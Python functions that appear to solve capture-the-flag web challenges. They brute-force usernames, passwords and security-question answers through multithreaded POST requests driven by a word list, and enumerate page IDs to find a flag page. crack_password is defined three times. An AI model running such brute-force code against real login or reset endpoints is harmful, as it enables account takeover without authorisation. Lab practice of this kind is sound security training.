def crack_username(ip, instance_id):
    """
    Try candidate usernames against the instance and report the accepted ones.

    Builds a POST template for ``<instance_id>/<ENDPOINT>`` and passes it to
    ``h.parallel_attack`` together with ``generate_uname_req``,
    ``data_file="uname_list.txt"`` and 20 threads.

    The response check keys on the ``>Invalid username<`` marker, so the
    result is only meaningful while the application answers unknown
    usernames with that distinct message; a uniform login error plus
    request throttling removes the signal.

    :param ip: target host, handed to ``HttpRequest`` unchanged
    :param instance_id: first path segment of the request URL
    :return: whatever ``h.parallel_attack`` returns (the usernames judged valid)
    """
    target_path = "/".join([instance_id, ENDPOINT])
    template = HttpRequest(
        ip,
        method=HttpMethod.POST,
        path=target_path,
        headers=HEADERS,
    )
    rejection_marker = r">Invalid username<"
    # NOTE(review): the True flag presumably makes a response *without* the
    # marker count as a hit -- confirm against f().
    return h.parallel_attack(
        template,
        generate_uname_req,
        f(rejection_marker, True),
        data_file="uname_list.txt",
        threads=20,
    )
def crack_password(ip, instance_id, username):
    """
    Try candidate passwords for a known username and report the accepted ones.

    Builds a POST template for ``<instance_id>/<ENDPOINT_LOGIN>`` and passes
    it to ``h.parallel_attack`` with the request generator returned by
    ``get_passwd_func(username)``, on 10 threads. Candidates come from
    ``uname_list.txt``, i.e. the username word list is reused as the
    password list.

    The response check keys on the ``Combination is invalid`` marker.

    :param ip: target host, handed to ``HttpRequest`` unchanged
    :param instance_id: first path segment of the request URL
    :param username: username the generated requests are built for
    :return: whatever ``h.parallel_attack`` returns (the passwords judged valid)
    """
    login_path = "/".join([instance_id, ENDPOINT_LOGIN])
    template = HttpRequest(
        ip,
        method=HttpMethod.POST,
        path=login_path,
        headers=HEADERS,
    )
    rejection_marker = r"Combination is invalid"
    build_request = get_passwd_func(username)
    # NOTE(review): the True flag presumably makes a response *without* the
    # marker count as a hit -- confirm against f().
    return h.parallel_attack(
        template,
        build_request,
        f(rejection_marker, True),
        data_file="uname_list.txt",
        threads=10,
    )
def crack_security_question(ip, instance_id, user_hash):
    """
    Try candidate security-question answers and report the accepted ones.

    Builds a POST template for ``<instance_id>/<ENDPOINT_RESET>`` and passes
    it to ``h.parallel_attack`` with the request generator returned by
    ``get_reset_func(user_hash)``, on 10 threads. Candidate answers come
    from ``uname_list.txt``, the same word list used for usernames.

    The response check keys on the ``Invalid answer`` marker. Nothing in
    this function limits the number of attempts, so it depends on the reset
    endpoint not throttling or locking out repeated wrong answers.

    :param ip: target host, handed to ``HttpRequest`` unchanged
    :param instance_id: first path segment of the request URL
    :param user_hash: user hash the generated reset requests are built for
    :return: whatever ``h.parallel_attack`` returns (the answers judged valid)
    """
    reset_path = "/".join([instance_id, ENDPOINT_RESET])
    template = HttpRequest(
        ip,
        method=HttpMethod.POST,
        path=reset_path,
        headers=HEADERS,
    )
    rejection_marker = r"Invalid answer"
    build_request = get_reset_func(user_hash)
    # NOTE(review): the True flag presumably makes a response *without* the
    # marker count as a hit -- confirm against f().
    return h.parallel_attack(
        template,
        build_request,
        f(rejection_marker, True),
        data_file="uname_list.txt",
        threads=10,
    )
def crack_password(ip, instance_id, username):
    """
    Try candidate passwords for a known username and report the accepted ones.

    Builds a POST template for ``<instance_id>/<ENDPOINT>`` and passes it to
    ``h.parallel_attack`` with the request generator returned by
    ``get_passwd_func(username)``, on 20 threads.

    The response check keys on the ``>Invalid password<`` marker.

    :param ip: target host, handed to ``HttpRequest`` unchanged
    :param instance_id: first path segment of the request URL
    :param username: username the generated requests are built for
    :return: whatever ``h.parallel_attack`` returns (the passwords judged valid)
    """
    target_path = "/".join([instance_id, ENDPOINT])
    template = HttpRequest(
        ip,
        method=HttpMethod.POST,
        path=target_path,
        headers=HEADERS,
    )
    rejection_marker = r">Invalid password<"
    build_request = get_passwd_func(username)
    # The common-word list used for usernames doubles as the password list
    # here; a dedicated password list would suit a real application better.
    # NOTE(review): the True flag presumably makes a response *without* the
    # marker count as a hit -- confirm against f().
    return h.parallel_attack(
        template,
        build_request,
        f(rejection_marker, True),
        data_file="uname_list.txt",
        threads=20,
    )
def search_secret_page(ip, instance_id, max_page_num):
    """
    Request page IDs 0..max_page_num and report the one that carries a flag.

    Builds a GET template for ``<instance_id>/<ENDPOINT>`` with a fixed
    ``id`` cookie and passes it to ``h.parallel_attack`` with
    ``generate_page_req``, the list of page numbers and 5 threads. The
    response check looks for the literal ``^FLAG^`` marker.

    :param ip: target host, handed to ``HttpRequest`` unchanged
    :param instance_id: first path segment of the request URL
    :param max_page_num: highest page number to request (inclusive); any
        value below 1 is replaced by 10
    :return: whatever ``h.parallel_attack`` returns (the page ID if found)
    """
    upper_bound = 10 if max_page_num < 1 else max_page_num
    page_ids = list(range(upper_bound + 1))
    target_path = "/".join([instance_id, ENDPOINT])
    # Fixed cookie value hard-coded for this exercise.
    # NOTE(review): it looks like an unsalted MD5 of a small integer, i.e. a
    # predictable identifier rather than a random session token -- confirm.
    session_cookies = {"id": "c81e728d9d4c2f636f067f89cc14862c"}
    template = HttpRequest(
        ip,
        method=HttpMethod.GET,
        path=target_path,
        cookies=session_cookies,
    )
    flag_marker = r"\^FLAG\^"
    # NOTE(review): the False flag presumably makes a response that *contains*
    # the marker count as a hit -- confirm against f().
    return h.parallel_attack(
        template,
        generate_page_req,
        f(flag_marker, False),
        sequence=page_ids,
        threads=5,
    )
def crack_password(ip, instance_id, username):
    """
    Try candidate passwords for a known username and report the accepted ones.

    Builds a POST template for ``<instance_id>/<ENDPOINT>`` with the query
    parameter ``page=sign_in.php`` and passes it to ``h.parallel_attack``
    with the request generator returned by ``get_passwd_func(username)``,
    on 10 threads. Candidates come from ``uname_list.txt``, i.e. the
    username word list is reused as the password list.

    The response check keys on the ``wrong username`` marker.

    :param ip: target host, handed to ``HttpRequest`` unchanged
    :param instance_id: first path segment of the request URL
    :param username: username the generated requests are built for
    :return: whatever ``h.parallel_attack`` returns (the passwords judged valid)
    """
    target_path = "/".join([instance_id, ENDPOINT])
    sign_in_query = {"page": "sign_in.php"}
    template = HttpRequest(
        ip,
        method=HttpMethod.POST,
        path=target_path,
        headers=HEADERS,
        params=sign_in_query,
    )
    rejection_marker = r"wrong username"
    build_request = get_passwd_func(username)
    # NOTE(review): the True flag presumably makes a response *without* the
    # marker count as a hit -- confirm against f().
    return h.parallel_attack(
        template,
        build_request,
        f(rejection_marker, True),
        data_file="uname_list.txt",
        threads=10,
    )